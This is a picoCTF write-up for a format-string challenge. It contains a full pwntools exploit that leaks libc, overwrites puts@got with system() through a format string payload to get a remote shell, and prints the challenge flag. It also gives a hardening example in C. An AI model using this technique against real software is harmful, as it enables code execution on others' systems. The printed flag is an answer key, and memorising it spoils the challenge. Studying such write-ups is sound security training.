Write-up author: jon-brandy
This program doesn't contain a win function. How can you win? Download the binary here. Download the source here. Download libc here, download the interpreter here. Run the binary with these two files present in the same directory.
Additional details will be available after launching your challenge instance.
Is there any way to change what a function points to?
- In this challenge we're given both the source code and the binary.
- The binary is 64 bit LSB, dynamically linked, and not stripped.
BINARY PROTECTIONS
- Upon reviewing the source code, the challenge is very straightforward.
- The binary has Partial RELRO, and there is a printf() call that is missing its format string argument (the user input is passed as the format itself), which introduces a format string bug (FSB).
- At the next LOC, puts() is called with the string /bin/sh as its argument.
- Our objective is to overwrite puts@got with libc.sym.system. That should get us a shell: system("/bin/sh").
- Now let's identify which function@got can be overwritten.
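For contrast with the bug described above, here is an added example (not the challenge's source, which this write-up does not reproduce) showing the vulnerable printf() pattern next to its hardened form, plus a small helper that counts the conversions printf() would parse from a string; the build flags in the comments are what would make the puts@got overwrite used in this write-up impossible. The sample input is constructed.

```c
#include <stdio.h>
#include <string.h>

/* Added example, not the challenge's own source (the write-up does not
 * reproduce it). Mirrors the bug class described: user input reaches
 * printf() as the format string, so '%' conversions in it are interpreted.
 * Defensive build flags:
 *   -Wformat -Wformat-security   warns on printf(user_input) below
 *   -Wl,-z,relro,-z,now          Full RELRO: the GOT is read-only after
 *                                startup, so the puts@got overwrite used
 *                                in this write-up would fault instead. */

/* Vulnerable pattern: the input *is* the format. */
void echo_vulnerable(const char *user_input)
{
    printf(user_input);   /* BUG: no constant format string */
}

/* Hardened form: constant format, input is an ordinary argument.
 * Writes into out and returns bytes written, or -1 if it did not fit. */
int render_safe(const char *user_input, char *out, size_t outsz)
{
    int n = snprintf(out, outsz, "%s", user_input);
    return (n < 0 || (size_t)n >= outsz) ? -1 : n;
}

/* Counts the conversions printf() would parse if s were used as a format
 * ("%%" is a literal percent, not a conversion). A non-zero count on data
 * that came from the user is exactly the condition behind the FSB. */
int count_conversions(const char *s)
{
    int count = 0;
    for (; *s; s++) {
        if (*s != '%') continue;
        if (s[1] == '%') { s++; continue; }  /* escaped percent sign */
        count++;
    }
    return count;
}

int main(void)
{
    const char *input = "%7$p %7$p";   /* constructed sample input */
    char buf[64];

    printf("conversions in input: %d\n", count_conversions(input));
    if (render_safe(input, buf, sizeof buf) >= 0)
        printf("rendered literally: %s\n", buf);
    return 0;
}
```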
IN GDB
- Nice! puts@got can be overwritten.
- Now let's find the offset.
RESULT
- To overwrite the GOT, I used fmtstr_payload; here's the full script:
FULL SCRIPT
from pwn import *

exe = './format-string-3'
elf = context.binary = ELF(exe, checksec=True)
context.log_level = 'INFO'

library = './libc.so.6'
libc = ELF(library, checksec=False)  # keep context.binary pointing at the challenge ELF

# sh = process(exe)
sh = remote('rhea.picoctf.net', 58943)

# The program prints the address of setvbuf in libc; parse it as hex
# instead of eval()-ing untrusted remote data.
sh.recvuntil(b'libc: ')
leak = int(sh.recvline().strip(), 16)
info(f'LIBC LEAK --> {hex(leak)}')

libc.address = leak - libc.sym['setvbuf']
info(f'LIBC BASE --> {hex(libc.address)}')

# Format-string write at offset 38 (found in gdb): overwrite puts@got with system()
payload = fmtstr_payload(38, {elf.got['puts']: libc.sym['system']})
sh.sendline(payload)
sh.interactive()
RESULT
- We got the flag!
picoCTF{G07_G07?_cf6cb591}